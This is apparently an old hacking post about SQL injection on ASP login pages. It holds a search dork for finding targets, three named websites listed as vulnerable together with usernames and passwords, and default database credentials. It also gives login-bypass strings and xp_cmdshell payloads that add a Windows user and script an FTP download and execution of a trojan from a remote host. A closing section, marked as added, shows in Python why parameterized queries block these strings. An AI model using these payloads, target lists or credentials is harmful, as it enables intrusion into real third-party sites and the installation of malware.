SQL Injection

google: allinurl:”login.asp”

JET DATABASE ENGINE INJECTION
———————————
admin’ or 1=’1 as password

Vulnerable:
1.http://www.kmsparts.com/administrator/login.asp U:admin pass:456123 sql:admin’ or 1=’1 as password
2.http://www.karbumi.co.id/admin.asp U:ADEK pass:INDRI
user:
admin’) or (’a’=’a
pass:
admin’ or ‘a’=’a

3.http://www.sinyoung-abadi.com/korea/admin/admin.asp U:admin’ or ‘a’=’a

SOURCE:
———————
‘ or 1=1;
‘; use master; xp_cmdshell ‘net user SomeUser SomeUsersPassword /add’;

DB
——————-
Oracle
U: sys
P: oracle

mySQL (Windows)
root
null

MS SQL Server
sa
null

DB2
dlfm
ibmdb2

EXECUTE
——————————
Note that the final SQL string is actually the concatenation of two individual strings. This is allowed by default in most databases and has many legitimate uses. In this case, however, the hacker used it to update the password for seth to a password of his choice (hacker). All the hacker has to do now is go back to the user/password form and enter seth as the user and hacker as the password to gain access to the site.

This same type of attack can be used to make the database execute the same extended stored procedures that we used in the direct attack section. For example, the following username entries will result in the creation and execution of a popular Trojan:

**Creates a file to be used by FTP**
Seth’; exec xp_cmdshell ‘”echo open 192.168.10.12″ >> c:\hack.txt’;
Seth’; exec xp_cmdshell ‘”echo USER” >> c:\hack.txt’;
Seth’; exec xp_cmdshell ‘”echo PASS” >> c:\hack.txt’;
Seth’; exec xp_cmdshell ‘”echo GET ncx99.exe” >> c:\hack.txt’;
Seth’; exec xp_cmdshell ‘”echo quit” >> c:\hack.txt’;

**Uses the previously created file to control a FTP session**
Seth’; exec xp_cmdshell ‘FTP.EXE -s:C:\hack.txt’;

**Executes the downloaded trojan**
Seth’; exec xp_cmdshell ‘c:\winnt\system32\ncx99.exe’;
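Why the login strings above work, and what stops them, shown as an added example that is not part of the original post. Python with an in-memory SQLite table stands in for the ASP login pages; the table, the stored password and the function names are constructed for illustration.

```python
import sqlite3

# Login string from this page, typed with plain ASCII quotes.
PAYLOAD = "admin' or 'a'='a"


def make_db():
    # Constructed user table standing in for the site's login database.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'constructed-secret')")
    return db


def login_concatenated(db, user, password):
    # Vulnerable pattern: form input is pasted into the SQL text, so a quote
    # in the input closes the string literal and the rest is parsed as SQL.
    sql = ("SELECT COUNT(*) FROM users WHERE username = '" + user +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchone()[0] > 0


def login_parameterized(db, user, password):
    # Hardened pattern: placeholders keep the input as data; quotes inside it
    # are compared literally and never reach the SQL parser.
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (user, password)).fetchone()[0] > 0


if __name__ == "__main__":
    db = make_db()
    # With concatenation the WHERE clause becomes
    #   username = 'admin' AND password = 'admin' or 'a'='a'
    # and the trailing OR is true for every row.
    print("concatenated, payload: ", login_concatenated(db, "admin", PAYLOAD))
    print("parameterized, payload:", login_parameterized(db, "admin", PAYLOAD))
    print("parameterized, real pw:",
          login_parameterized(db, "admin", "constructed-secret"))
```

The same binding rule applies to the `Seth'; exec xp_cmdshell ...` entries: passed as a parameter, the whole string is just a username that matches no row. Running the application under a database account without rights to `xp_cmdshell`, rather than the default `sa` login listed above, limits the damage if a concatenated query is missed.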
